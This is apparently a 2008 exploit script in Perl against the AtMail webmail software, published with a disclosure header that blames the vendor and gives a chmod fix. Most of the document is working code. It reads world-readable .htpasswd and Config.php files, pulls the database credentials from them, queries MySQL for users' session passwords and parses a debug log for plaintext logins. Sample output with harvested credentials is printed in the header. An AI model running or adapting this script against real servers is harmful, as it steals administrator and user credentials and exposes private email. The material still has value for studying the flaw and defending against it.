AtMail leaves world readable files available post install, allowing for the htpasswd file and more to be extracted.
4cdb25f15cb84fcb65b8a8362e83c80708f7391a4778ac56436fdc5a11d8a1b0
#!/usr/bin/perl
################################################################################
#
# LEGAL:
# Permission is granted to freely reproduce this document in its entirety
# under the condition that the contents are not altered in any way.
# milw0rm IS permitted to add their standard footer: // milw0rm.com / date
# Permission to view or reproduce this file is NOT granted to any
# individual with the first name Gadi and the last name Evron, due to the
# prior history of at least 1 individual with this name of making false
# claims that researchers notified them about recently released exploits.
#
# PRODUCT:
# AtMail - atmail.com
#
# VENDOR:
# CalaCode - calacode.com
#
# DOWNLOAD:
# http://atmail.org/download/atmailopen.tgz
# http://atmail.com/demo/atmailphpdemo.tgz
#
# PROBLEM:
# World readable files in the default install lead to sensitive
# information disclosure, loss of integrity.
#
# SOLUTION:
# chmod 640 /path/to/Config.php /path/to/.htpasswd
#
# NOTIFICATION:
# 5/27/2008 - Several emails were sent back and forth, explaining how the
# world readable Config.php issue could be abused. Multiple subsequent
# attempts to obtain a status update from the vendor were unreplied to.
# It's now 07/29/2008. Instead of taking a few moments of their time to
# bring the level of security of the servers this software is installed
# on back up to the same level it was BEFORE this software was installed
# (excluding any other vulnerabilities that may exist in this software),
# the vendor is happily pushing their product at HostingCon at this time.
# (JULY 28-30, 2008).
#
# STATUS:
# Not fixed.
#
# USAGE:
# ./atmail.pl
#
# or simply use it as a CGI script. The vendor claims that ssh access is
# required to abuse this issue. What they really mean is that all someone
# needs is the ability to invoke a few commands from the shell. This is
# easily done in countless ways without requiring authentication via ssh.
#
# +----------------------------------------------------+
# | WEBADMIN USER CREDENTIALS (.htpasswd) |
# +----------------------------------------------------+
# admin:$apr1$L.BPJMnK$sjep5SUN4PG5A.Anw5/Id0
#
# +----------------------------------------------------+
# | DATABASE CREDENTIALS (Config.php) |
# +----------------------------------------------------+
# USER: atmail
# PASS: AF4hubB493
# HOST: localhost
#
# +----------------------------------------------------+
# | CLIENT CREDENTIALS (MySQL) |
# +----------------------------------------------------+
# USER: alice@atmail.com PASS: atmail
# USER: bob@atmail.com PASS: doesn't
# USER: carol@atmail.com PASS: getit
#
# +----------------------------------------------------+
# | MORE CLIENT CREDENTIALS (/tmp/popimap_debug) |
# +----------------------------------------------------+
# USER: alice PASS: atmail
# USER: bob PASS: doesn't
# USER: carol PASS: getit
#
#
# ADDED BONUS: client information persists in the database even after the user
# has logged off.
#
# To make this code work, you must fill in the paths. I don't condone
# malicious use of the information provided in this script, just as I don't
# condone vendor complacency.
#
# If you have found any of this information to be useful to you or someone
# you know, PLEASE consider donating to the Julie Amero Defense Fund:
#
# Official Blog
# http://julieamer.blogspot.com
#
# Trial Transcript
# http://julieamero.blogspot.com
#
# http://google.com/search?q=julie+amero
#
# and/or contacting news outlets, state legislators, the prosecution, etc and
# letting them know your thoughts in a polite and professional manner.
#
################################################################################
# print "Content-type: text/plain\n\n";
use strict;
use warnings;
my $atmail_path = shift || '';
my $atmail_htpasswd_path = $atmail_path . '';
my $atmail_config_path = $atmail_path . '';
my $atmail_popimap_debug = '';
my ( $sql_user, $sql_pass, $sql_host );
-e $atmail_path or die "$atmail_path does not exist\n";
###############################################################################
# For logging into https://example.com/atmail/webadmin
###############################################################################
if ( open my $atmail_htpasswd_path_fh, '<', $atmail_htpasswd_path )
{
print_line();
print "|\tWEBADMIN USER CREDENTIALS (.htpasswd) |\n";
print_line();
while ( <$atmail_htpasswd_path_fh> ) {
print;
}
close $atmail_htpasswd_path_fh;
print "\n";
}
###############################################################################
# For accessing the atmail db
###############################################################################
if ( open my $atmail_config_fh, '<', $atmail_config_path )
{
print_line();
print "|\tDATABASE CREDENTIALS (Config.php) |\n";
print_line();
while ( <$atmail_config_fh> )
{
$sql_user = $1 if ( m{ sql_user ' \s => \s ' (.*) ' , }ixms );
$sql_pass = $1 if ( m{ sql_pass ' \s => \s ' (.*) ' , }ixms );
$sql_host = $1 if ( m{ sql_host ' \s => \s ' (.*) ' , }ixms );
}
close $atmail_config_fh;
print "USER: $sql_user\nPASS: $sql_pass\nHOST: $sql_host\n";
print "\n";
}
###############################################################################
# For reading grandma's email
###############################################################################
my $sessions = "mysql -h $sql_host -u $sql_user -p$sql_pass atmail -e 'select * from UserSession \\G'";
if ( open my $mysql_fh, '-|', $sessions )
{
print_line();
print "|\tCLIENT CREDENTIALS (MySQL) |\n";
print_line();
while ( <$mysql_fh> )
{
if ( m{ Account: \s (\S+) }xms ) {
print "USER: $1\t";
}
elsif ( m{ Password: \s (\S+) }xms ) {
print "PASS: $1\n";
}
}
close $mysql_fh;
print "\n";
}
###############################################################################
# Debugging is not enabled by default, and you do have the choice of
# configuring the location of the debug log. The default is /tmp/popimap_debug
# which also presents a symlink attack issue if left to the default setting.
###############################################################################
if ( open my $popimap_debug_fh, '<', '/tmp/popimap_debug' )
{
my %accounts;
print_line();
print "|\tMORE CLIENT CREDENTIALS (/tmp/popimap_debug) |\n";
print_line();
my ( $popimap_debug_user, $popimap_debug_pass );
while ( <$popimap_debug_fh> )
{
if ( m{ \A C: \s ATMAIL00 \s LOGIN \s "(.*)" \s "(.*)" }ixms ) {
$accounts{$1} = $2;
}
}
close $popimap_debug_fh;
while ( my ( $user, $pass ) = each ( %accounts ) ) {
print "USER: $user\tPASS: $pass\n";
}
print "\n";
}
sub print_line
{
print "+----------------------------------------------------+\n";
}